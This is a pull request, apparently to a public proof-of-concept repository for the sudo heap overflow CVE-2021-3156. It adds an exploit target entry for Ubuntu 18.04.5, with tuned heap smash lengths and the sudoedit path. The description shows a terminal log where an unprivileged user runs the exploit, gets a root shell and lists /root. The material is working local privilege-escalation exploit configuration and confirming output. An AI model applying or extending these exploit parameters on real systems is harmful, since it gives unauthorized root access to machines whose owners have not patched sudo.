### PR TITLE
Update with stanza for 18.04.5 (knightmare2600)

### DIFF
--- a/hax.c
+++ b/hax.c
@@ -38,7 +38,7 @@ typedef struct {
 
 target_t targets[] = {
     {
-	## Yes, same values as 20.04.1, but also confirmed.
+	// Yes, same values as 20.04.1, but also confirmed.
         .target_name    = "Ubuntu 18.04.5 (Bionic Beaver) - sudo 1.8.21, libc-2.27",
         .sudoedit_path  = "/usr/bin/sudoedit",
         .smash_len_a    = 56,

--- a/hax.c
+++ b/hax.c
@@ -38,6 +38,15 @@ typedef struct {
 
 target_t targets[] = {
     {
+	## Yes, same values as 20.04.1, but also confirmed.
+        .target_name    = "Ubuntu 18.04.5 (Bionic Beaver) - sudo 1.8.21, libc-2.27",
+        .sudoedit_path  = "/usr/bin/sudoedit",
+        .smash_len_a    = 56,
+        .smash_len_b    = 54,
+        .null_stomp_len = 63, 
+        .lc_all_len     = 212
+    },
+    {
         .target_name    = "Ubuntu 20.04.1 (Focal Fossa) - sudo 1.8.31, libc-2.31",
         .sudoedit_path  = "/usr/bin/sudoedit",
         .smash_len_a    = 56,


### PR DESCRIPTION

Did a quick test on a freshly installed Ubuntu 18.04.5 ISO downloaded this morning from the Ubuntu site:

```
notsudo@sudo1804:/home/notsudo/CVE-2021-3156$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description:    Ubuntu 18.04.5 LTS
Release:        18.04
Codename:       bionic

notsudo@sudo1804:/home/notsudo/CVE-2021-3156$ whoami
notsudo
notsudo@sudo1804:/home/notsudo/CVE-2021-3156$ id
uid=1001(notsudo) gid=1001(notsudo) groups=1001(notsudo)
notsudo@sudo1804:/home/notsudo/CVE-2021-3156$ groups
notsudo
notsudo@sudo1804:/home/notsudo/CVE-2021-3156$ ./sudo-hax-me-a-sandwich 0

** CVE-2021-3156 PoC by blasty <peter@haxx.in>

using target: 'Ubuntu 18.04.5 (Bionic Beaver) - sudo 1.8.21, libc-2.27'
** pray for your rootshell.. **
[+] bl1ng bl1ng! We got it!
# id
uid=0(root) gid=0(root) groups=0(root),1001(notsudo)
# ls -la /root
total 20
drwx------  3 root root 4096 Jan 31 13:58 .
drwxr-xr-x 24 root root 4096 Jan 31 13:57 ..
-rw-r--r--  1 root root 3106 Apr  9  2018 .bashrc
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
drwx------  2 root root 4096 Jan 31 13:58 .ssh
```